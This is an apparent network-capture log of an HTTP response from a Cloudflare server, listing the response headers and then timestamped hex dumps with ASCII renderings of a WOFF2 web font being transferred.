                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0VAUkNADqBHAzSNrgoY4HRNR8uX%2BkA1Nypjyjdcf%2BG1uyqbh0FPfwPz4Uk60xb8DURHeEXXtkHrY8x0Xb8gNeRklMzVDAEaGr0dObywPNIWMIK5mFS9MVZBOv%2Bb%2BQtlGszWIM3PuOBFtJiU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4065c7481b1-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC846INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9
                                                                                                                                                                                                                                                                                                              Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC847INData Raw: e7 5c 86 85 d3 9e f2 8b 86 29 a5 0d c0 36 cb cd 9d e7 e6 c2 d8 6d 56 83 60 00 4a d9 b4 52 82 41 09 0a 52 0a 82 01 12 16 4a 19 99 8b 54 97 79 db c5 d6 17 f5 bb c5 b9 8a ab 6d bf e3 e1 6b 2d b0 d7 1f ba 7b 27 96 55 64 22 d9 87 15 82 43 07 24 64 2a 2e 4e 20 39 7d fe 4e 5d ed 0e 32 70 83 71 d5 54 db 99 0e 36 1e 2d 41 08 55 96 f1 17 88 22 b9 ce 83 6f d9 5c 18 11 93 07 ed ed bc 75 68 9b a9 85 24 d6 97 de 34 6a ab b3 76 87 a4 83 39 a2 13 bf 04 61 6e 6c 2f 4e 54 b7 a5 f4 aa 4b c6 dd fb f0 6b ea fb 41 a4 cb 05 10 da 8e a0 c6 cc a9 09 d9 ff 55 35 53 96 3d cb 74 5b 86 29 2f 73 d6 52 b7 eb a5 c9 f6 dd b9 17 b5 46 99 94 29 36 48 20 41 01 d4 27 3f 21 fe f9 e7 a8 dd 37 53 d1 b2 ab a4 89 15 77 3a de 8e 25 92 48 96 40 d1 08 b6 6c 3f ff 03 00 6c 6d 16 ef 6c 55 64 20 44 fe
                                                                                                                                                                                                                                                                                                              Data Ascii: \)6mV`JRARJTymk-{'Ud"C$d*.N 9}N]2pqT6-AU"o\uh$4jv9anl/NTKkAU5S=t[)/sRF)6H A'?!7Sw:%H@l?lmlUd D
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC848INData Raw: 81 6a 2a 88 76 89 af 47 89 e1 2a 1a 89 50 0e 52 f2 35 30 aa 1c f3 f7 82 fa c6 8c a8 d4 ca 9a f8 be df cf 5f fc fe cd 9f 43 fe 4f 5c 98 ba d3 12 58 c6 0a 56 b1 81 cd 37 73 e2 dd 73 9f 3e cc b8 6d 5e 2d 50 52 a6 1f 38 08 86 8d a4 7b 79 90 7d 7a 82 ee 06 7d 4e 64 23 a9 8c 82 69 83 91 4b 19 99 2c a5 9f 3a 90 28 f8 29 38 27 d2 4a de c8 f2 35 28 a9 d4 28 4d b1 4e 1f ad 2e 06 c6 c9 58 7f 03 ee 11 fb 9c 23 aa 25 4f 4b 1b 7a b5 83 68 48 ba 9c 7d 20 e8 54 30 d5 04 14 00 26 1a 2c 0b 54 b2 80 cb 34 90 36 a9 da b5 c2 17 d7 d5 c7 90 71 2b cd 8a 60 60 37 d2 71 3f 7f f5 e7 60 9b f1 b9 00 cd d2 45 52 22 f4 ee 56 07 ac a1 1f 48 86 e6 07 d6 ad 42 75 b7 65 82 d8 84 02 a2 da 84 a1 5c 49 4e 75 af 8f c3 b7 ea f1 a2 94 58 66 80 80 6c 25 f3 d8 75 af ac f0 67 57 7b 6a 37 a8 f2 f0
                                                                                                                                                                                                                                                                                                              Data Ascii: j*vG*PR50_CO\XV7ss>m^-PR8{y}z}Nd#iK,:()8'J5((MN.X#%OKzhH} T0&,T46q+``7q?`ER"VHBue\INuXfl%ugW{j7
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC850INData Raw: f2 04 30 61 e5 e5 c9 53 28 31 2f f8 9a ee d5 63 81 ca 11 9a 97 35 26 9b 71 d5 5f 83 ce 81 84 1b 33 45 e8 72 ff bb db 61 b2 49 c7 62 6c c5 a6 d9 c4 24 54 6f a9 f8 67 66 5e 2d a1 d1 63 26 60 1a 48 83 94 f4 b2 0f 35 67 41 7e ac dc 54 0d 75 3b 17 3e 77 a3 da d3 6a 91 76 33 b7 01 3c e6 08 1e 8c 6e 81 34 f6 0e 04 df e5 03 cd 49 00 51 2d 42 08 48 12 94 54 1e 95 cd 77 5c 9d 12 d4 36 ce 37 13 be 9c 7d 74 5b 41 8e c0 00 2e 4f e4 a4 a6 1e e0 be 7d cc bd 50 2f 64 4e 3a 81 5d c8 fe 5d c3 7d 8e 8c 32 48 83 77 0d 90 7b 13 d2 57 6e b0 06 4d 75 68 c5 55 77 d5 35 f8 49 26 62 3d d6 a4 e2 ca 23 21 a6 56 a3 4f be 0e 7f 36 9d 5e 71 0c a3 03 92 78 3a c4 c9 65 66 ff 5b b5 c9 5d 7f 97 9a b0 d0 cb 2b a9 2b c6 f5 9c 64 17 83 0b ca ab 0c f2 a6 37 19 bb 54 19 0c 61 de e5 05 7e 1d dd
                                                                                                                                                                                                                                                                                                              Data Ascii: 0aS(1/c5&q_3EraIbl$Togf^-c&`H5gA~Tu;>wjv3<n4IQ-BHTw\67}t[A.O}P/dN:]]}2Hw{WnMuhUw5I&b=#!VO6^qx:ef[]++d7Ta~
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC851INData Raw: e5 fb a7 9e ab 01 83 01 08 b4 a9 61 4b d6 79 06 66 0a 61 45 d4 1d d2 15 c7 ed 0f 39 40 72 9e 46 cb 35 24 69 23 8c 95 9a c1 12 e4 49 43 12 83 9b b3 77 77 aa 36 c5 6e 2b 25 e7 ee 33 90 60 27 6e cf e1 10 79 2a 48 74 8e 2d 96 0c 1e 2f 8e 21 2a 51 01 6f 3a dd d9 21 eb 6b 30 cd 5a ff 09 46 6d d7 38 c2 04 fb 4d 62 bc dd 0e 0f 23 13 cc c8 5d 90 1b 33 dc 81 58 cb 9f 31 d9 cb 70 14 bd 46 7e dc b6 c8 23 df 40 bd 87 f9 83 a5 21 24 d1 29 d6 90 ee 58 87 3d 09 80 e0 6a bb c0 a0 88 c4 aa 19 91 8f b2 3a 86 a1 c7 51 94 8d 27 34 7e 93 6d 79 84 7f 22 72 18 a7 cd 70 05 69 e3 44 db f8 ff af 9e d4 85 b4 cd e2 18 d5 3f 96 c3 09 cf c6 e4 5c 6d 0a 06 af 81 a3 25 42 c5 20 cd b7 cb aa a1 25 e4 61 93 4d 79 d2 4c 04 ae d7 c0 67 c6 a8 b1 07 00 76 2c 87 64 92 61 c8 f2 82 94 2e 87 d9 21
                                                                                                                                                                                                                                                                                                              Data Ascii: aKyfaE9@rF5$i#ICww6n+%3`'ny*Ht-/!*Qo:!k0ZFm8Mb#]3X1pF~#@!$)X=j:Q'4~my"rpiD?\m%B %aMyLgv,da.!
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC852INData Raw: 7f bd 9e 19 7a f9 ac d5 73 5d f9 a6 eb fb f3 7c 99 a5 ff c9 fc 7b 1f 99 c4 4d 67 34 db b8 85 68 00 eb 95 0d b0 ed 9a a1 0c be 43 9e 79 ca 13 45 f3 e9 6c 2e bc 3d 60 4b 49 e0 18 c3 66 bd 73 44 04 5c f3 6d c0 b3 07 ce ae cc e6 31 db 93 f3 6c bf ac ec cc 71 75 de 9c f7 bf 15 eb e0 7e 48 ff fd e8 70 5f 94 c9 94 72 42 d1 01 99 88 67 08 03 b9 71 0a d7 bf 8d a3 75 da ae 3a b9 15 31 c9 ef 88 53 cb 00 81 81 8c 9a f8 51 19 ab d1 aa 83 25 60 21 77 9b cd fb 55 e0 cd 67 bf 4b 1a d6 82 d7 89 ec 04 00 58 23 21 bb 6d 36 82 f9 8a 2d e1 26 a5 61 bc c8 04 cc 05 ba 85 e5 2c 6d c3 f1 f3 38 00 35 ca 8a 94 b6 b9 45 01 63 8d f5 42 26 23 2b 8f 9e 00 a8 57 ae 4c 7a d7 ca b4 6a 9a 6e 68 45 cb 7a 73 ec ec ca 6a 1d 9c 93 ed e0 d0 ee f2 22 bb e4 a0 57 78 d2 d0 d0 81 98 be 92 68 36 2a
                                                                                                                                                                                                                                                                                                              Data Ascii: zs]|{Mg4hCyEl.=`KIfsD\m1lqu~Hp_rBgqu:1SQ%`!wUgKX#!m6-&a,m85EcB&#+WLzjnhEzsj"Wxh6*
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC854INData Raw: 7b f3 77 b6 3d 98 7f fa ec ba b7 35 14 5c 7e d1 4a b7 ee dc 51 78 6e fd 3e 89 84 1f dd 81 fc a5 c9 a0 97 29 76 de 70 39 03 52 d6 f1 72 56 62 75 ee 79 aa d8 b8 e1 be 07 1e 7a ec 89 e7 8e fa ec ab 6f be fb 9d f5 c2 93 93 30 58 2f fd 0c 32 4c 92 49 a7 ba f8 ea 93 0f b5 5d f3 5d bf 50 a2 87 26 7a c4 d8 05 b3 bd 34 c7 2b f3 bc 31 d7 6b 0b bc 63 e6 aa 95 3e 5a ea 5f cb fd 9f c4 45 4b fc 23 cb ff 47 b8 96 ac 23 fb eb 38 fc 8c 85 af b8 75 e1 79 03 d7 5b 98 b8 c4 dd 5e c3 fd c4 bb 2b 59 77 5f f3 fd 05 45 0f 85 b7 29 ba 15 d0 37 36 f5 56 d2 53 71 9f 74 80 7c 2b 6a a8 8a 41 ca 87 09 70 4e 7c 10 d3 48 b5 c1 ea 46 a9 1f cd 1a ca 3c 46 c3 38 b6 30 91 6e ca 9d a8 73 82 b6 68 5d 93 34 4f 16 ea 4b e5 09 46 a7 1b 53 97 6a 7a 86 a9 74 33 9a 33 f4 dd 17 ce 9f 8d 11 eb 17 13
                                                                                                                                                                                                                                                                                                              Data Ascii: {w=5\~JQxn>)vp9RrVbuyzo0X/2LI]]P&z4+1kc>Z_EK#G#8uy[^+Yw_E)76VSqt|+jApN|HF<F80nsh]4OKFSjzt33
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC855INData Raw: 0b d4 34 bd 2c b2 73 fa a6 93 03 68 60 d9 19 55 17 a4 8a 5b c7 e3 d3 2a f5 23 1e 4b be 4a 56 b7 e8 14 2c 4d 2d a6 15 97 db 2c 6a 77 f9 a7 f2 66 0e 33 4b d9 3c 2c 29 99 e0 85 46 67 cb c3 b4 65 c5 c3 07 bb aa 20 fe ae 28 c0 88 7a 64 30 63 38 aa 0a 2a 86 f0 14 ea d8 65 d8 3e 71 30 09 56 b1 a5 f9 b0 61 0f 2e 91 dd 11 85 6d 56 4d 05 03 d8 a0 b8 a6 41 d8 36 5c 0c 1b 00 6c 50 1a 62 0c 80 9b 7b 6b 74 d4 d0 09 15 a7 20 7f bd b2 0d 76 01 71 d6 df 77 8a 65 41 78 9a e0 f5 4b 20 21 68 28 a1 04 43 cc b3 da 4c c4 22 77 ea 2d 86 02 b7 12 c4 07 a7 6e 29 59 2e ed e5 5b 9c 19 24 53 e7 65 8d 02 f8 6b 73 ca d4 3d 31 2c 42 fd 94 37 14 8f 1b c6 ce 0a a6 4e 63 f7 b4 dc c9 ea 4b d7 22 b2 7d cb a9 96 d5 da ca 50 6b 69 5e 7f d7 75 c8 39 42 55 03 f2 3e 12 85 96 02 38 35 49 a6 80 15
                                                                                                                                                                                                                                                                                                              Data Ascii: 4,sh`U[*#KJV,M-,jwf3K<,)Fge (zd0c8*e>q0Va.mVMA6\lPb{kt vqweAxK !h(CL"w-n)Y.[$Seks=1,B7NcK"}Pki^u9BU>85I
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC856INData Raw: e0 34 91 58 ba be c5 00 21 83 60 01 fc 35 de bf 85 08 2c 98 0e 09 11 57 76 e4 20 2d 99 77 b1 26 d7 75 33 9e 75 32 8c 35 f2 06 34 c5 76 59 5e 93 84 3d 6e 0e b4 dd a1 7a cb b8 b3 48 ef 14 e3 f6 83 d2 f0 ce a6 aa fb dc cb 34 90 8f 85 ed 05 4d 33 d5 47 9e b1 d7 b9 41 01 66 74 34 04 d9 06 46 6c f0 52 68 84 cb c0 f8 47 82 59 07 ba 72 86 5b a1 7e 85 e0 29 36 cb 0a 91 45 d6 95 1d f1 57 0e 79 59 45 1b 21 22 ad c8 2c d2 a0 8d 80 7d 45 8e d8 06 2f a2 26 6d 27 e9 f0 07 62 5d 42 8e b9 0c 3b e3 23 94 ef fd b5 33 02 b3 cd a6 3c 99 f1 f6 84 a6 db 34 19 57 b5 92 7c e9 51 47 8c 7b 09 ee 9c 9c 39 3b b7 21 a8 05 e9 15 66 d0 8e 90 90 6b 92 7f 10 2d de 03 75 06 ca d0 20 71 ec b1 2c 2d d1 5c 51 3a a5 c3 64 5d fd f0 8e 61 4b 38 68 2c c9 64 fd 36 d4 2b 8d 9f 6d 59 11 8e 5b 9d 42
                                                                                                                                                                                                                                                                                                              Data Ascii: 4X!`5,Wv -w&u3u254vY^=nzH4M3GAft4FlRhGYr[~)6EWyYE!",}E/&m'b]B;#3<4W|QG{9;!fk-u q,-\Q:d]aK8h,d6+mY[B
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC858INData Raw: 98 e5 21 14 ee 30 b0 dd 3e b7 b1 83 45 d3 14 1f 2b 44 4b da a0 1f b8 e6 bf 49 b9 e2 f9 ff 2e 78 dd 3f 26 5d d8 68 07 c6 a2 a4 f8 86 9c 90 4d b7 7c 27 db 48 4e 87 1d b9 fa 07 85 6f b8 e9 36 e7 6b a5 f2 4e ac 64 20 69 0c f0 74 17 db ed 98 f0 69 09 0f 1e c3 60 aa 68 dc b0 66 bf be 4f 22 92 71 b3 ad 03 b4 4b f7 93 de d0 89 45 bc 03 6a de 2a 3a 57 cc a6 6e 32 cb b7 27 d9 34 1b f6 27 7f 33 67 aa f1 27 98 aa dc d8 02 50 fe 9a 6d 09 83 ee 7d 3b dd 43 ea c9 a5 3f 68 06 28 7d 56 a1 8c a5 72 1e 4a b3 11 6f 3c e7 50 75 98 b7 36 e5 73 10 05 8b 18 6e c9 9e 2d fa af 75 35 f9 fd 31 ba 78 53 2f 17 a7 4a dd 57 86 ad 2c 7b aa b9 69 7d c4 95 52 ed 35 e0 9c 6d ae ba 81 32 02 3c 8f 52 7e dd 99 30 63 82 3b 45 ec 72 c5 8b f9 72 b1 5a ae 59 c0 f6 20 79 e9 22 e2 b1 ce 92 cd 32 93
                                                                                                                                                                                                                                                                                                              Data Ascii: !0>E+DKI.x?&]hM|'HNo6kNd iti`hfO"qKEj*:Wn2'4'3g'Pm};C?h(}VrJo<Pu6sn-u51xS/JW,{i}R5m2<R~0c;ErrZY y"2
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC859INData Raw: 59 20 26 83 cb e9 b3 7c 44 1a 02 e2 58 6c 24 2e f4 10 19 ab 2f 43 83 d0 cc 7d 62 8d 8a 87 8e 50 5d cc 3a e7 65 31 d6 b3 da 93 be ae 53 53 13 4b 4f 4c fe 41 ea 25 5d 27 93 1d e6 4a 09 bf 20 c5 28 e4 fb b8 c8 bf 66 29 58 7d 39 3a 69 33 7c 8c 38 64 4b a3 ae b1 ae 68 9c 78 03 7c a1 d5 69 df 21 5a f6 dc 64 b3 cf af bb bc ae c3 36 99 cd d7 fb b1 ef a3 e0 9c ea b2 f3 65 44 d4 92 82 d9 91 e4 c5 37 f5 76 25 f5 d5 6a c1 fc f6 eb a4 e1 ae d4 ea 29 4e 3d ba d7 77 8e 6d c6 02 e2 05 10 2e 1c 90 6a a4 54 41 a9 f8 1a f3 3f be 45 10 1e 00 c0 c8 cf 35 e3 ff 48 a7 86 79 9c 89 ae 0d a0 99 0e f1 35 a3 88 1b ff 5b ca 56 6b 5b 08 9f 33 a3 85 85 9c 8d 36 05 b6 c5 76 e5 ab d6 b8 7a b8 39 0a 0a 99 c9 00 df d4 07 40 49 5c 09 87 e0 62 45 29 39 2d 50 4f 64 95 41 98 e0 ea 18 35 d6 c6
                                                                                                                                                                                                                                                                                                              Data Ascii: Y &|DXl$./C}bP]:e1SSKOLA%]'J (f)X}9:i3|8dKhx|i!Zd6eD7v%j)N=wm.jTA?E5Hy5[Vk[36vz9@I\bE)9-POdA5
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC860INData Raw: ee 31 f1 4c 49 75 33 53 7a dc e4 40 cd bf f2 5d 04 a3 19 7f ca 50 9c 74 aa a2 75 37 53 ad 9a a1 29 8a 96 b6 45 8e 35 cf 9c 9b 9b b5 64 57 25 a7 be 10 8b 7b 3a c3 d9 f1 5b 52 28 b0 9f 2e 30 ef a0 41 b4 76 1a 6c 79 c3 ee d8 fd eb bf 29 0b 80 41 44 90 40 c8 3b d1 11 2b b3 99 f1 a4 e2 64 8a b0 4c 5a 75 3a a2 0f 13 33 1a fe c1 db a6 ce e2 d1 13 38 49 e8 54 24 04 fc 60 8e 19 4f 2a 49 a6 16 68 15 9c 44 78 49 45 b0 78 ad 65 9c 1c cc de 62 bd 0c 6c 02 02 1b cf 15 34 7d ae bd fc c7 c4 1f 5c df 32 2d 01 fd 37 14 f4 60 8e ad 3f 4c 4a 93 a9 e2 72 25 8f 96 ad 43 a1 ba 50 1c 75 12 5d a4 2d e6 27 c7 2b 28 8e 5e 3e b7 aa 8c 7a 1e 8b 75 4b 8f 4d 8f 22 44 1f 3f be 05 88 67 47 d2 5f 85 fe c0 b8 eb cd d9 e1 38 24 88 38 24 8f 05 de e9 fd 49 29 2a 2d 64 47 f9 92 93 08 50 6d 47
                                                                                                                                                                                                                                                                                                              Data Ascii: 1LIu3Sz@]Ptu7S)E5dW%{:[R(.0Avly)AD@;+dLZu:38IT$`O*IhDxIExebl4}\2-7`?LJr%CPu]-'+(^>zuKM"D?gG_8$8$I)*-dGPmG
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC862INData Raw: 8b ac 75 53 de 79 ed dc 27 0b ac e1 93 d5 0d 45 f8 04 d3 7f b2 ce 1a b6 bb b2 5a ef c0 ee 7a b7 df f4 f5 fa 55 3d 5a ff 9d 3e 21 48 7a 9a 3b 3c 79 ac 51 e7 75 c2 eb c2 70 bd b1 b3 24 4d 10 9f 46 c0 c6 47 a2 51 b9 99 7a 7b d5 50 09 31 37 9e 44 c4 c7 c7 c4 c7 65 d2 4f 4d d7 01 4c 00 cf 49 f8 ad f2 37 4f 72 5d 9d c3 cf a2 b9 1a e4 e7 73 b5 f2 aa e7 1f d0 4a 68 e0 f8 5b 28 2b f4 3f 33 01 85 b2 fa bf b5 66 87 0b e9 3f d3 1c 1d da cf 34 80 86 42 67 30 d0 50 f4 6a 06 2d 3e c2 08 88 71 05 6b 74 d1 d7 f5 de fe d8 c8 53 91 2e ac 35 da e5 9e f4 cf 6a c8 c7 de 35 1e ff 8e 5d 46 26 cf 95 05 23 3d 96 fe bd c1 5c 22 5f 83 23 bf 95 57 0a ff 3c 55 16 35 19 59 5e a1 6a cb a8 10 4a b4 dd 95 96 d6 ce 76 87 b8 dc 9f be 5c 5f 2a 1b 47 88 f8 55 84 17 e5 21 ec 8c 06 7d 63 47 8e
                                                                                                                                                                                                                                                                                                              Data Ascii: uSy'EZzU=Z>!Hz;<yQup$MFGQz{P17DeOMLI7Or]sJh[(+?3f?4Bg0Pj->qktS.5j5]F&#=\"_#W<U5Y^jJv\_*GU!}cG
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC863INData Raw: a1 f4 05 9e 5b bd 7d 41 3e a3 a8 ca f2 2f 94 ec 83 35 b5 0b 44 99 ee bc 04 9f 2f 65 c0 f0 5d 58 56 7a 05 84 cd 4d aa dd 42 dd 8c 34 3c f6 09 f6 f5 f5 04 06 21 75 77 36 31 e3 ed 5c 7e 25 8c 9a dd 80 81 60 44 79 38 d6 29 01 47 fb c0 5a 6d 9d b2 d6 12 fd c5 9f ed 3f f9 d3 a9 9f f6 fb 6b 9c 88 35 5f f6 d7 6a eb c3 5e f4 5c 85 29 3f 21 83 81 90 a0 d1 00 95 d3 75 f3 7c 84 7f 35 9d 97 d0 a7 50 0c c6 f3 07 ae 0d 42 7b ec 31 e1 a5 76 89 d4 d8 d9 6d c2 05 9a 73 7f 31 2f bf 0b 53 63 84 92 4e 3e 74 53 c3 33 94 f5 8c a5 a7 ca 3c db bb a6 6e 8d 84 00 2e a7 32 95 51 a9 a9 65 d1 49 2c 69 f2 33 60 7c 06 9b 2b f1 a9 f3 19 bc f9 c3 ad a4 6c 07 98 43 aa bc 5e c3 8a 3e b5 41 bb c2 f8 de 49 1b f7 da 6c 7d 65 8e d3 7e 96 f1 fd 8a b6 41 77 26 66 e0 c0 a6 4f 94 ef cd f6 7f 01 f9
                                                                                                                                                                                                                                                                                                              Data Ascii: [}A>/5D/e]XVzMB4<!uw61\~%`Dy8)GZm?k5_j^\)?!u|5PB{1vms1/ScN>tS3<n.2QeI,i3`|+lC^>AIl}e~Aw&fO
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC864INData Raw: e5 be 42 6f ec a4 ed 6b 32 33 4b b4 25 15 6c 96 5a bb a2 99 cc d2 8a d2 67 82 13 e9 2d e3 49 e5 93 2d 8d a7 4b de bd e6 98 97 51 38 e7 e3 54 49 5b 7b dc 12 ab bd 2b 45 97 d3 fd dc 48 5f 73 cc 29 4e 03 83 15 ba c9 b7 89 dd a2 93 2b 03 f1 61 48 25 03 34 12 91 09 53 14 9f 29 71 03 27 1b 1f 1d 8e 2c 96 92 7b 1b 61 d9 66 5d 74 52 65 10 50 98 30 65 c7 b5 e0 14 63 51 ed 9c d6 0b 43 ac a9 38 ab d0 aa 84 a9 1d da cb 1e 9d 9a 49 85 f2 eb d7 87 da 6c ad 90 87 b6 36 8f 04 67 c8 9f 93 16 30 2f c7 f3 ca 78 31 88 98 0e 94 26 c4 47 48 49 e4 02 10 3a c1 fc a4 74 c0 96 06 96 15 83 50 8a 34 8e 80 46 e7 f2 49 44 6e 1e 35 dd 05 ee 78 a7 b9 43 b2 28 82 e9 de 80 2a a2 66 5e 8c e0 53 03 7e 65 a0 ac ff 6c 96 75 9a 59 3e cc ba 8c e7 78 c9 78 9d b7 ab f7 ca 87 69 e2 25 92 73 f1 e2
                                                                                                                                                                                                                                                                                                              Data Ascii: Bok23K%lZg-I-KQ8TI[{+EH_s)N+aH%4S)q',{af]tReP0ecQC8Il6g0/x1&GHI:tP4FIDn5xC(*f^S~eluY>xxi%s
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC866INData Raw: 78 80 93 a8 db 0e 84 5e 74 bf c6 61 fc 10 45 10 48 14 26 4e ed 9a 30 ea 78 ed 65 9c 77 f0 f9 16 89 54 19 df 77 a4 59 30 3f b2 a4 e5 de 48 3c 9c 38 ed cc 41 90 15 9e 74 2b 01 02 69 47 0f eb 42 1c 7b f8 35 90 38 d6 7a 64 ec f4 5a 40 a2 a6 7a f7 79 67 2d a2 fd c1 9b e1 5d d4 c5 21 43 ee 68 f4 f1 33 87 8b 6a 56 39 11 97 cd 71 6e bd bb 6a e6 aa a6 da b3 90 4f dd 71 db 2d fa 78 4e e4 4f 39 89 7b ae 21 48 91 97 82 33 12 90 48 d8 bb 4b cf f0 d3 aa e3 2c a8 1a 4e 7c 48 b1 c2 ff 01 1e be 0a 39 be 00 40 2c 92 0e 78 64 9c 80 ff c7 d2 4e 27 b5 26 68 3c 67 fd 9a f9 ff 92 8e 6f 6d 66 78 76 2c c3 d9 df b3 77 22 40 02 f0 ef f3 fd d4 eb 54 0a a8 e7 fb 25 95 ed 93 cf f7 db 30 e6 36 65 0e 75 5e 18 87 43 2e de 01 eb d6 d6 b6 e0 8f b6 29 d5 ad 89 f4 e0 0c 8e e7 ec 9a 9c 60 7e
                                                                                                                                                                                                                                                                                                              Data Ascii: x^taEH&N0xewTwY0?H<8At+iGB{58zdZ@zyg-]!Ch3jV9qnjOq-xNO9{!H3HK,N|H9@,xdN'&h<gomfxv,w"@T%06eu^C.)`~
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC867INData Raw: 17 20 26 c2 3d 1b b3 26 b5 0a 00 9b b6 6c f2 9a a7 81 32 4e 28 1f 18 84 ab d4 de f8 78 3c ee 06 36 6e 12 fb 2b 7b 17 85 81 af f3 b2 a3 11 03 a9 df e6 f2 09 95 02 ae 83 f0 c8 c5 59 b8 8b 8f c7 74 74 9d 0b 96 74 fb 65 5c dd 45 75 87 69 dd bd b8 69 78 8e e1 9b 7e 8a 9f 99 a2 10 27 32 f7 5c 21 9c c6 1e 69 1a 11 3a d6 f8 62 2e 78 75 6d 93 05 30 a7 cd 07 1c 86 1e b8 8e 8b 2d 4c c9 28 44 49 59 42 b4 1c 4e 8a b4 d7 cf ea 9c 70 c4 51 57 8d 46 d9 e1 b0 eb c1 2f 75 68 1d 61 bf 3d db 6e d9 a8 33 d5 10 9b db ad 66 bc 35 25 40 18 68 17 15 2c 4c 1a be 98 84 1d b2 bb 08 e4 64 36 73 25 c1 e0 80 9e 60 30 e2 a0 02 82 8b a3 15 4f 10 34 a9 87 7c 72 48 7d 50 c8 46 1d 63 28 fa 60 20 91 3d 02 56 fc ed 30 37 92 97 14 9e 4a 95 6b b1 29 0c 03 b4 68 97 c7 63 29 79 1d a9 12 70 23 53
                                                                                                                                                                                                                                                                                                              Data Ascii: &=&l2N(x<6n+{Yttte\Euiix~'2\!i:b.xum0-L(DIYBNpQWF/uha=n3f5%@h,Ld6s%`0O4|rH}PFc(` =V07Jk)hc)yp#S
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC868INData Raw: c1 21 34 de 7d b1 0e 69 7f 60 12 c4 84 a3 a3 bb 05 90 87 cd 67 01 9b 81 83 3f e2 4b a2 e5 83 68 94 dd 41 66 a4 85 bc d6 d8 5d 4e 90 69 74 a0 c0 22 27 6b ca 26 73 5c 7e 78 05 31 47 45 50 07 9b 82 72 e4 fd 21 e7 3a 8a a7 2c 48 d0 1d d2 62 51 43 39 cd 81 d3 67 fd c7 f3 ba 7d 3f 3f e3 e9 60 6c d4 db ef db 86 4b a1 7e fd 87 34 23 07 63 9d 4d 25 93 0d 23 31 a6 79 21 c9 46 c7 6c 95 46 95 7a d4 d3 e8 9d fe 09 44 92 b7 fd 69 05 d1 24 36 09 df 65 27 5a 1f f6 fd 1a e1 43 ba 7f 7b 78 7b bd 59 ef fa dd 6c 52 15 59 ea 39 a6 3e 6c aa 8c e7 78 ae 87 69 81 37 16 ca e9 d1 4c e1 87 01 0b 1e d9 a7 2a af 58 8d 86 b4 d2 9b 1b 23 46 09 5c 1e ef e6 aa 6b 1f ee ae de 6c de 2c e6 6d df f5 59 55 34 45 36 b0 3f 41 f1 80 58 a7 d6 e1 87 a6 04 1d ba e7 88 78 f0 7d e5 8e ee af 76 62 ca
                                                                                                                                                                                                                                                                                                              Data Ascii: !4}i`g?KhAf]Nit"'k&s\~x1GEPr!:,HbQC9g}??`lK~4#cM%#1y!FlFzDi$6e'ZC{x{YlRY9>lxi7L*X#F\kl,mYU4E6?AXx}vb
